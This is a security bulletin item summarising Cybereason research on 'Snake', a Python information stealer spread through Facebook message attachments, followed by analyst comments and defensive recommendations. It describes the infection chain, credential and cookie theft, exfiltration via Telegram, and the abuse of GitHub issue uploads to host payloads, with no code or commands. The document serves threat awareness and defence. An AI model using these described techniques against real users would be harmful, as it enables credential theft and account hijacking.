New Python-Based Snake Info Stealer Spreading Through Facebook Messages

Facebook messages are being used by threat actors to a Python-based information stealer dubbed Snake that's designed to capture credentials and other sensitive data. "The credentials harvested from unsuspecting users are transmitted to different platforms such as Discord, GitHub, and Telegram," Cybereason researcher Kotaro Ogino said in a technical report. Details about the campaign first emerged on the social media platform X in August 2023. The attacks entail sending prospective users seemingly innocuous RAR or ZIP archive files that, upon opening, activate the infection sequence. The intermediate stages involve two downloaders – a batch script and a cmd script – with the latter responsible for downloading and executing the information stealer from an actor-controlled GitLab repository. Cybereason said it detected three different variants of the stealer, the third one being an executable assembled by PyInstaller. The malware, for its part, is designed to gather data from different web browsers, including Cốc Cốc, suggesting a Vietnamese focus. The collected information, which comprises credentials and cookies, is then exfiltrated in the form of a ZIP archive via the Telegram Bot API. The stealer is also designed to dump cookie information specific to Facebook, an indication that the threat actor is likely looking to hijack the accounts for their own purposes. The malware operators are leveraging a GitHub vulnerability that allows an uploaded file associated with an issue on a repository to persist even in scenarios where the issue is never saved. "This means that anyone can upload a file to any git repository on GitHub, and not leave any trace that the file exists except for the direct link," the researchers said, adding the malware comes fitted with capabilities for command-and-control (C2) communications.

Security Officer Comments:
The threat actor utilizes the reputation and implicit trust that Facebook has to trick users into trusting the messages they receive from this actor. They gain initial access through phishing Facebook messages that lure their victims into downloading malicious attachments. The threat actor maintains 3 different variants of this Infostealer, likely to utilize the most effective and appropriate payload for the victim’s web browser. This Infostealer gathers sensitive data such as credentials and cookies from multiple different browsers including Google Chrome. Due to a few indicators, we can likely conclude that the attackers are Vietnamese-speaking individuals. One indicator is that the two older variants of this Infostealer only target three kinds of browsers, notably, one of them being the Coc Coc browser widely used by the Vietnamese community. Additionally, some of the comments in the scripts and the function names are written in Vietnamese. It is worth noting that the most recent variant of this malware does not use obfuscation on the primary script revealing that some TTPs are version-dependent.

Suggested Corrections:
Cybereason recommends taking these actions in your MDR:

  • Enable Application Control to block the execution of malicious files.
  • Enable Fileless Protection with detect mode on download payload.
  • Enable Variant Payload Prevention with prevent mode on Cybereason Behavioral execution prevention.
  • Ensure that users and employees are educated on the risks of downloading files from untrusted sources, especially via social media platforms while in a corporate network.
  • To hunt proactively, use the Investigation screen in the Cybereason Defense Platform and the queries in the Hunting Queries section to search for assets that have potentially been infected. Based on the search results, take further remediation actions, such as isolating and re-imaging the affected machines.

Cybereason Technical Analysis